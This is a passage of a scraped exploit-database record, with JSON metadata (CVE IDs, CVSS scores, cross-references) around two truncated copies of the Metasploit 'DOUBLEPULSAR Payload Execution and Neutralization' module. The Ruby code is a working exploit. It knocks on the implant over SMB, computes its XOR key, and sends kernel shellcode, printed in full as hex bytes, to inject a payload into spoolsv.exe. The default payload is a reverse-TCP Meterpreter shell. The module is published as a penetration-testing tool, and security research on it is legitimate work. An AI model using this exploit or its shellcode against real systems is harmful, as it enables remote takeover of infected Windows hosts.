to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-03] #"}, "lastseen": "2021-10-03T00:16:48", "differentElements": ["sourceData"], "edition": 33}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "e0ec20a5c8398bf5ca1d6486b6c8c1d3", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-04T06:22:51", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "zdt", 
"idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27803"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:41987", "EDB-ID:42031", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96709", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-04T06:22:51", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-10-04T06:22:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => 
true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = 